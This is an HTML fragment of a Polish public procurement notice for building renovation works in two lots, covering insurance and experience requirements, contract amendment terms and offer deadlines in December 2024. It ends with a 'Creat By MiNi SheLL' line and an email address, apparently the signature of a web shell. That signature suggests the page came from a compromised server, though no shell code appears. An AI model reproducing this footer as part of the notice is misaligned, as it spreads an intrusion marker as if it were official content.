<br/>b)	300 000,00 PLN dla części zamówienia nr 2. <br/>W przypadku, gdy wykonawca składa ofertę na obie części zamówienia, powinien legitymować się ubezpieczeniem OC dla prowadzonej działalności związanej z każdym ww. przedmiotem zamówienia na kwotę nie mniejszą niż 300 000,00 PLN łącznie. <br/>4)	zdolności technicznej lub zawodowej: zamawiający uzna ten warunek MINIMALNY za spełniony, jeśli Wykonawca wykaże, że wykonał roboty budowlane:<br/>a)	dla zadania nr 1 o wartości co najmniej 50 000 zł brutto, polegające na remoncie i/lub konserwacji lub/ i modernizacji obiektów budowlanych na rzecz zamawiającego/ych publicznego/ych, w rozumieniu art. 4 Ustawy Pzp (tj. Dz. U. 2024, poz. 1320) w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z załączeniem dowodów, że zostały wykonane należycie, <br/>b)	dla zadania nr 2 o wartości co najmniej 300 000 zł brutto, polegające na remoncie i/lub konserwacji lub/ i modernizacji obiektów budowlanych na rzecz zamawiającego/ych publicznego/ych, w rozumieniu art. 4 Ustawy Pzp (tj. Dz. U. 2024, poz. 1320) w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z załączeniem dowodów, że zostały wykonane należycie,<br/>2.	UWAGA! Dla ofert złożonych na oba zadania, zamawiający przyjmie doświadczenie minimalne (wykaz wykonanych robót) wskazane w ust. 1, pkt 4) litera „b”. <br/>3.	W odniesieniu do warunków udziału w postępowaniu wykonawcy wspólnie ubiegający się o udzielenie zamówienia, mogą polegać na zdolnościach tych z wykonawców, którzy wykonają części robót, do realizacji których te zdolności są wymagane. <br/>4.	W przypadku, o którym mowa w ust. 3 wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynikać będzie zakres realizowany przez poszczególnych wykonawców (według wzoru na załączniku nr 6, punkt 6 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wezwie Wykonawcy, którego oferta została najwyżej oceniona, do złożenia podmiotowych środków dowodowych na potwierdzenie braku wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od wezwania, podmiotowych środków dowodowych potwierdzających spełnianie warunków udziału w postępowaniu aktualnych na dzień składania, które określa rozdział 6, ustęp 1, punkt c) oraz d), czyli:<br/>1)	ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż:<br/>a)	50 000,00 PLN dla części zamówienia nr 1. <br/>b)	300 000,00 PLN dla części zamówienia nr 2. <br/>W przypadku, gdy wykonawca składa ofertę na obie części zamówienia, powinien legitymować się ubezpieczeniem OC dla prowadzonej działalności związanej z przedmiotem zamówienia dot. obu części na sumę gwarancyjną nie mniejszą niż 300 000,00 PLN łącznie.<br/>2)	zdolności technicznej lub zawodowej: zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, że wykonał roboty budowlane:<br/>a)	dla zadania 1 o wartości co najmniej 50 000 zł brutto, polegające na remoncie i/lub konserwacji lub/ i modernizacji obiektów budowlanych na rzecz zamawiającego/ych publicznego/ych, w rozumieniu art. 4 Ustawy Pzp (tj. Dz. U. 2024, poz. 1320) w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, ORAZ dla wskazanej formularzu ofertowym ilości robót dodatkowych wraz z załączeniem dowodów, że wszystkie zostały wykonane należycie,<br/>b)	dla zadania 2 o wartości co najmniej 300 000 zł brutto, polegające na remoncie i/lub konserwacji lub/ i modernizacji obiektów budowlanych na rzecz zamawiającego/ych publicznego/ych, w rozumieniu art. 4 Ustawy Pzp (tj. Dz. U. 2024, poz. 1320) w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, ORAZ dla wskazanej formularzu ofertowym ilości robót dodatkowych wraz z załączeniem dowodów, że wszystkie zostały wykonane należycie,<br/>UWAGA! Dla ofert złożonych na oba zadania (zad 1 i zad. 2), zamawiający przyjmie doświadczenie minimalne (wykaz wykonanych robót) wskazane w ust. 5, pkt 2) li „b”.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy występujący wspólnie: <br/>a)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do Oferty.<br/>b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, składają oświadczenia, o których mowa w Rozdziale 8 SWZ, potwierdzające spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>c)	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie, jeśli jest to wymagane przez ustawę art. 58 ust 1-5. ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikiem 5A i 5B do SWZ - wzorami umowy dla zadania nr 1 oraz zadania nr 2:<br/>1.	Wszelkie zmiany i uzupełnienia Umowy, w tym zmiany adresu siedzib będą wymagały pod rygorem nieważności formy pisemnej w postaci aneksu, z wyłączeniem zmiany, o której mowa w §11 ust. 1 i ust. 2 umowy (dotyczy osób podanych do realizacji umowy).<br/>2.	Strony dopuszczają możliwość zmiany Umowy w następujących przypadkach:<br/>1)	zmiana jest korzystna dla Zamawiającego;<br/>2)	zmiany obowiązujących przepisów prawa;<br/>3)	zaistnienia siły wyższej; <br/>4)	zmiany dotyczącej terminu realizacji umowy, jeżeli uzasadnione to będzie okolicznościami leżącymi po stronie Zamawiającego, w szczególności sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi <br/>5)	zmiany dotyczącej w szczególności terminu realizacji zamówienia lub warunków płatności za zamówienie, jeżeli zaistniała inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna, techniczna lub faktyczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy zgodnie z opisem przedmiotu zamówienia, <br/>6)	wycofania z produkcji produktów i innych materiałów potrzebnych do realizacji przedmiotu umowy (po terminie otwarcia ofert) i zastąpienia go sprzętem o parametrach nie gorszych niż oferowany za cenę taką jak ustalona w umowie.<br/>3.	Zmiany do Umowy następują na pisemny wniosek jednej ze Stron wraz z uzasadnieniem konieczności wprowadzenia tych zmian.<br/>4.	Zmiany będą zgodne z reżimami zapisów art. 455 ustawy pzp.<br/>5.	Zamawiający nie dopuszcza dokonywania przez Wykonawcę cesji praw, w tym wierzytelności wynikających z niniejszej Umowy na osoby trzecie bez uprzedniej, wyrażonej na piśmie pod rygorem nieważności, zgody Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy zakupowej zamawiającego (vide rozdziały 9 oraz 12 SWZ).</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-18 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com